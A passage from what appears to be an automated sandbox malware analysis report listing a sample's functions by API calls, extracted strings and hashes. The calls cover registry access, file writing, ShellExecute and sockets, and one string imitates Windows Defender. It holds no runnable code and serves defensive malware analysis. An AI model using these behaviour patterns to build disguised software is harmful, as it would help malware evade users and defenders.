                                  • Instruction Fuzzy Hash: 37611E71900229AFCF10DFA8DD89AEEBBB9FF48714F155216E515F7290DB70A900CBA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Close_memset_strncpy
                                  • String ID: A$A$ADVAPI32.dll$Key$RegC$RegE$RegO$eyEx$eyEx$lose$numK$penK
                                  • API String ID: 398226110-1513123901
                                  • Opcode ID: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                  • Instruction ID: c30f4dc3bad79d9701a9ac7cf73166623d042e9d2b59a8c1656fc9434beae7d0
                                  • Opcode Fuzzy Hash: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                  • Instruction Fuzzy Hash: 3651D5B5D0122CAFDB61DF95CD84AEEBBB8FB48304F1000A9E509A7210D7749A94CF61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Close_memset_strncpy
                                  • String ID: A$A$ADVAPI32.dll$Key$RegC$RegE$RegO$eyEx$eyEx$lose$numK$penK
                                  • API String ID: 398226110-1513123901
                                  • Opcode ID: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                  • Instruction ID: 6570460de5860f22f59f610b6db523a60cae84646223255b99467aaef9325b81
                                  • Opcode Fuzzy Hash: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                  • Instruction Fuzzy Hash: EE51C6B590122CAFDB61DF95CC85AEEBBB8FF48344F1040A9E509A7211D7749E84CF61
                                  APIs
                                  • __fassign.LIBCMT ref: 036493B8
                                  • _memset.LIBCMT ref: 036493EC
                                  • _memset.LIBCMT ref: 03649410
                                  • _strcat_s.LIBCMT ref: 0364942B
                                  • _sprintf.LIBCMT ref: 036494AC
                                  • _sprintf.LIBCMT ref: 036494D4
                                  • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 0364950A
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 03649593
                                  • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 036495DF
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 036495EB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                  • String ID: %s%s$:$\$text.e
                                  • API String ID: 3001508280-2720340845
                                  • Opcode ID: 01a61206051ec77cbdfa5d34e4a78fc33b4c029da38912455276437bd67be555
                                  • Instruction ID: ea5e973f85143002a4e37ef911a74d8833b0037d52c7bf17d38e3c4124086d36
                                  • Opcode Fuzzy Hash: 01a61206051ec77cbdfa5d34e4a78fc33b4c029da38912455276437bd67be555
                                  • Instruction Fuzzy Hash: 9891D171D40628AFDB36DB54DC84BDBBBB8AB09314F1401E9E618A7280D7719AC9CF94
                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 03642396
                                  • VariantInit.OLEAUT32(?), ref: 036423D8
                                  • VariantInit.OLEAUT32(?), ref: 036423F8
                                  • VariantInit.OLEAUT32(?), ref: 03642415
                                  • VariantInit.OLEAUT32(?), ref: 03642432
                                    • Part of subcall function 036416CE: __EH_prolog3.LIBCMT ref: 036416D5
                                    • Part of subcall function 036416CE: SysAllocString.OLEAUT32(?), ref: 036416FD
                                  • _memset.LIBCMT ref: 036426A2
                                  • _memset.LIBCMT ref: 036426D5
                                  • _mbstowcs.LIBCMT ref: 036426ED
                                  • VariantInit.OLEAUT32(?), ref: 036427B2
                                  • VariantInit.OLEAUT32(?), ref: 036427CF
                                    • Part of subcall function 0364172E: InterlockedDecrement.KERNEL32(?), ref: 03641739
                                    • Part of subcall function 0364172E: SysFreeString.OLEAUT32(00000000), ref: 0364174E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: InitVariant$String_memset$AllocDecrementFreeH_prolog3H_prolog3_Interlocked_mbstowcs
                                  • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                  • API String ID: 2704202341-2587304410
                                  • Opcode ID: 85bb1b6dba8845eb6832dcc241e22674bc42bc2413ebe57639f70d2a06e4931d
                                  • Instruction ID: 88228683c9b07ccc8ace5b5b2cf9d2ccb594d6760133c0e234cfdeccca55fa72
                                  • Opcode Fuzzy Hash: 85bb1b6dba8845eb6832dcc241e22674bc42bc2413ebe57639f70d2a06e4931d
                                  • Instruction Fuzzy Hash: 7FF12971900629AFDB22DF64CD84A9EB7BDEF45304F1084D9E909AB250C771AF8ACF50
                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 10002392
                                  • VariantInit.OLEAUT32(?), ref: 100023D4
                                  • VariantInit.OLEAUT32(?), ref: 100023F4
                                  • VariantInit.OLEAUT32(?), ref: 10002411
                                  • VariantInit.OLEAUT32(?), ref: 1000242E
                                    • Part of subcall function 100016CA: __EH_prolog3.LIBCMT ref: 100016D1
                                    • Part of subcall function 100016CA: SysAllocString.OLEAUT32(?), ref: 100016F9
                                  • _memset.LIBCMT ref: 1000269E
                                  • _memset.LIBCMT ref: 100026D1
                                  • _mbstowcs.LIBCMT ref: 100026E9
                                  • VariantInit.OLEAUT32(?), ref: 100027AE
                                  • VariantInit.OLEAUT32(?), ref: 100027CB
                                    • Part of subcall function 1000172A: InterlockedDecrement.KERNEL32(?), ref: 10001735
                                    • Part of subcall function 1000172A: SysFreeString.OLEAUT32(00000000), ref: 1000174A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: InitVariant$String_memset$AllocDecrementFreeH_prolog3H_prolog3_Interlocked_mbstowcs
                                  • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                  • API String ID: 2704202341-2587304410
                                  • Opcode ID: 85bb1b6dba8845eb6832dcc241e22674bc42bc2413ebe57639f70d2a06e4931d
                                  • Instruction ID: c4f995021f6d453e0b67c1534942b25dbd89ffe59a045e9db0a1cde3e0b7ba2d
                                  • Opcode Fuzzy Hash: 85bb1b6dba8845eb6832dcc241e22674bc42bc2413ebe57639f70d2a06e4931d
                                  • Instruction Fuzzy Hash: 0AF10872900629AFDB12DF64CC84A9EB7BDEF45304F0085D5E909AB254D771AF8ACF90
                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 03642D4F
                                  • _memset.LIBCMT ref: 03642D78
                                  • Sleep.KERNEL32(00000001), ref: 03642D98
                                  • _malloc.LIBCMT ref: 03642DD2
                                  • _memset.LIBCMT ref: 03642DFF
                                  • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 03642E17
                                  • _free.LIBCMT ref: 03642E1E
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03642E46
                                  • FlushFileBuffers.KERNEL32(?), ref: 03642E52
                                  • CloseHandle.KERNEL32(?), ref: 03642E5E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                  • String ID: cef.dll$lib
                                  • API String ID: 1923221151-1944707463
                                  • Opcode ID: 3b7f21238bacadc657d5a8a56433dd2a6ff2117a5362b6b3c84e5166f2e26b1f
                                  • Instruction ID: 97e2ff760761ea12a5318e336354433350f2d2d687773154eebd63b671c65664
                                  • Opcode Fuzzy Hash: 3b7f21238bacadc657d5a8a56433dd2a6ff2117a5362b6b3c84e5166f2e26b1f
                                  • Instruction Fuzzy Hash: 8931A271D0022CAFDB25DF648C84BEAB779EB19700F0045D5F688A7250D6B19FC58F60
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID: Rsp Parse Error!$code$code Error!$msg$qrcode$qrcode Error!$response$response Error!
                                  • API String ID: 269201875-2838377452
                                  • Opcode ID: 599f3664890dfd251fabf13ef7453cbb470f910d76f5606c6711dc7cc21d23be
                                  • Instruction ID: f80102e89131b556915b3c174a44694c652c3bbf314bd721eea245ddd39d9479
                                  • Opcode Fuzzy Hash: 599f3664890dfd251fabf13ef7453cbb470f910d76f5606c6711dc7cc21d23be
                                  • Instruction Fuzzy Hash: EA7101B1D043088BCB10EFA0C881ADEB7B5EF44714F15456EE9157B382DB38AD85CB99
                                  APIs
                                  • _memset.LIBCMT ref: 0364290C
                                  • _memset.LIBCMT ref: 0364291E
                                  • _memset.LIBCMT ref: 0364292D
                                  • _memset.LIBCMT ref: 03642B1E
                                  • _memset.LIBCMT ref: 03642C3B
                                  • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 03642CA4
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03642CC7
                                  • FlushFileBuffers.KERNEL32(00000000), ref: 03642CCE
                                  • CloseHandle.KERNEL32(00000000), ref: 03642CD5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                  • String ID: <
                                  • API String ID: 2144675991-4251816714
                                  • Opcode ID: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                  • Instruction ID: 9b7bd507181a5680bd10634883d92edfe958857a9e25a4d5b64f234a4cca416f
                                  • Opcode Fuzzy Hash: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                  • Instruction Fuzzy Hash: 51C1F076C00228AEDB21DF64CC849EABBFDEB09754F14C5EAF509A6150DB318F858F54
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID: 0}B$Msg$Obj$RES$[Notice]MSG Error!$[Notice]RES Error!$[Notice]Rsp Parse Error!
                                  • API String ID: 269201875-1782929323
                                  • Opcode ID: 1e68510126bfa72bc46471a3d57d4b5b77bf72f55be6068ffa668a56fbcc5238
                                  • Instruction ID: e1dc275b282ce019acf22a76f68e19061cb2a77fd65f973232ce16d4ef2f8df8
                                  • Opcode Fuzzy Hash: 1e68510126bfa72bc46471a3d57d4b5b77bf72f55be6068ffa668a56fbcc5238
                                  • Instruction Fuzzy Hash: D581807150C3409BD320DF24C881B9BB7F5BF84744F40892EF59957292DB78A948CB97
                                  APIs
                                  • GetCommandLineW.KERNEL32(000000FF,ExecuteGame,ED2F953D,?,755613C0,?,000000FF,?,00410E3F,?,?,006FD638), ref: 0041179D
                                  • CommandLineToArgvW.SHELL32(00000000,?,755613C0,?,000000FF,?,00410E3F,?,?,006FD638), ref: 004117A4
                                  • _memcpy_s.LIBCMT ref: 00411977
                                  • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000005), ref: 004119D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CommandLine$ArgvExecuteShell_memcpy_s
                                  • String ID: --feihuo$ExecuteGame$ExecuteGame:error,$open$yun_game_id
                                  • API String ID: 3847668404-1005890697
                                  • Opcode ID: 7bed15792b36077b9b6f609ce8d74b94429a9e187beef292469044a8a60118a1
                                  • Instruction ID: 2af083e08b68adfb570592fc054282c18a9c1ca409c7def1e871dbcade9d5dca
                                  • Opcode Fuzzy Hash: 7bed15792b36077b9b6f609ce8d74b94429a9e187beef292469044a8a60118a1
                                  • Instruction Fuzzy Hash: ABD1E0716006019FD704DB6CCC91EAAB3B5FF85334B28C76DE1259B2E1DB35AA06CB94
                                  APIs
                                    • Part of subcall function 00428A50: __strftime_l.LIBCMT ref: 00428A94
                                    • Part of subcall function 00428A50: OutputDebugStringA.KERNEL32(?,?,?,?,?,ED2F953D), ref: 00428AA3
                                    • Part of subcall function 00428A50: GetACP.KERNEL32(?,?,?,?,ED2F953D), ref: 00428AA9
                                  • recv.WS2_32(?,?,00000001,00000002), ref: 00418216
                                  • WSAGetLastError.WS2_32(?,00414D98), ref: 00418222
                                  • send.WS2_32(?,00000000,00000002,00000000), ref: 0041826C
                                  • WSAGetLastError.WS2_32(?,00414D98), ref: 0041827B
                                  • WSAGetLastError.WS2_32 ref: 004182BB
                                  • WSAGetLastError.WS2_32 ref: 004182CF
                                    • Part of subcall function 004289F0: __strftime_l.LIBCMT ref: 00428A1C
                                    • Part of subcall function 004289F0: OutputDebugStringW.KERNEL32(?), ref: 00428A2B
                                  Strings
                                  • Send socket data failed(err=%d)., xrefs: 0041827E
                                  • Send socket data%s, xrefs: 004181FA
                                  • The socket has been disconnected!, xrefs: 00418234
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ErrorLast$DebugOutputString__strftime_l$recvsend
                                  • String ID: Send socket data failed(err=%d).$Send socket data%s$The socket has been disconnected!
                                  • API String ID: 2413326941-4143001793
                                  • Opcode ID: 9e480a8153547b500284dcd37306fd1203a01cdc4f3995d9c1fe795f3f1c1a7d
                                  • Instruction ID: c7dcb8c0283466b73eaf7007b09b45fe9c35480a9c746bb810a263ba5ba8cc97
                                  • Opcode Fuzzy Hash: 9e480a8153547b500284dcd37306fd1203a01cdc4f3995d9c1fe795f3f1c1a7d
                                  • Instruction Fuzzy Hash: 1C3113B1A40205AFD714DB68DC06BAE77A9EF85720F14426EF815E73D1EF7899008BA4
                                  APIs
                                  • GdipCreateFontFamilyFromName.GDIPLUS(Arial,00000000,?,004136E9), ref: 00422E5B
                                  • GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422E8B
                                  • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422EAA
                                  • GdipCreateFont.GDIPLUS(00000000,00000000,00000000,00000003,00000000), ref: 00422ECC
                                  • GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422EEE
                                  • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422F0D
                                  • GdipCreateFont.GDIPLUS(?,00000000,00000000,00000003,00000000), ref: 00422F29
                                  • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422F32
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: FontGdip$Family$CreateDelete$GenericSansSerif$FromName
                                  • String ID: Arial
                                  • API String ID: 778451959-493054409
                                  • Opcode ID: 5c26adeb644eb546e83f6da1232f65c2aff8f5eb5dad50e615ba98e2f54c7368
                                  • Instruction ID: 2b93083f641ebe4919f66077f20c57abdc533cb4a836b56b1f36a8212e8c19f9
                                  • Opcode Fuzzy Hash: 5c26adeb644eb546e83f6da1232f65c2aff8f5eb5dad50e615ba98e2f54c7368
                                  • Instruction Fuzzy Hash: 41316BB4700206BBD7209FA5ED04B5AFBB9FB44701F00C65EE94597390DB74D800CB94
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00662032
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066203C
                                  • int.LIBCPMT ref: 00662053
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • moneypunct.LIBCPMT ref: 00662076
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066208A
                                  • __CxxThrowException@8.LIBCMT ref: 00662098
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 006620AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmoneypunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: Xs$bad cast
                                  • API String ID: 2090539961-3260119552
                                  • Opcode ID: 49a4995d311e5a88e06176a56a8423239daced5f485f8219e0fb6a7b49904bbc
                                  • Instruction ID: 8bc1f1f8a79de84126f0be9b71d47aaa7b8798e2a25d6427c0638307c24f1ce6
                                  • Opcode Fuzzy Hash: 49a4995d311e5a88e06176a56a8423239daced5f485f8219e0fb6a7b49904bbc
                                  • Instruction Fuzzy Hash: 6A01C03190021A9BCB09EBB0C862AFD7727AF40721F14011DF9117B2D1DF78AA458799
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00661046
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661050
                                  • int.LIBCPMT ref: 00661067
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • numpunct.LIBCPMT ref: 0066108A
                                  • std::bad_exception::bad_exception.LIBCMT ref: 0066109E
                                  • __CxxThrowException@8.LIBCMT ref: 006610AC
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 006610C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: ,s$bad cast
                                  • API String ID: 1289509941-831669854
                                  • Opcode ID: 5693cccb49d185a93962ed605ff57d4b49cdebb7c3cd7e815f5ad86a0a6e7c4b
                                  • Instruction ID: 0df5e830d0d88d29cf1e4febdbdb9ac07aa64a03b9cc06a36e04746fc23b24f3
                                  • Opcode Fuzzy Hash: 5693cccb49d185a93962ed605ff57d4b49cdebb7c3cd7e815f5ad86a0a6e7c4b
                                  • Instruction Fuzzy Hash: C901AD319002099BCF05EBB0D842AFE7737AF41721F14021DF9107B2D1CF78AA859B99
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 0066121D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00661227
                                  • int.LIBCPMT ref: 0066123E
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00661261
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00661275
                                  • __CxxThrowException@8.LIBCMT ref: 00661283
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00661299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
                                  • String ID: Ps$bad cast
                                  • API String ID: 1676052248-4043858998
                                  • Opcode ID: 7ee40cf687ccc232ac78faa6488d8f27d910a1d7159bc6563c24aa4580b98fbc
                                  • Instruction ID: 65fcd92fad2f35417c3666b5d0beb1e3420dbb5c15982c1203fa4e6e078486a3
                                  • Opcode Fuzzy Hash: 7ee40cf687ccc232ac78faa6488d8f27d910a1d7159bc6563c24aa4580b98fbc
                                  • Instruction Fuzzy Hash: 4C01C4329002099BCB45EBB4D863AFE7727AF41721F14051DF510BB2E1DF789A458798
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00660AC1
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00660ACB
                                  • int.LIBCPMT ref: 00660AE2
                                    • Part of subcall function 00402340: std::_Lockit::_Lockit.LIBCPMT ref: 00402351
                                  • codecvt.LIBCPMT ref: 00660B05
                                  • std::bad_exception::bad_exception.LIBCMT ref: 00660B19
                                  • __CxxThrowException@8.LIBCMT ref: 00660B27
                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 00660B3D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
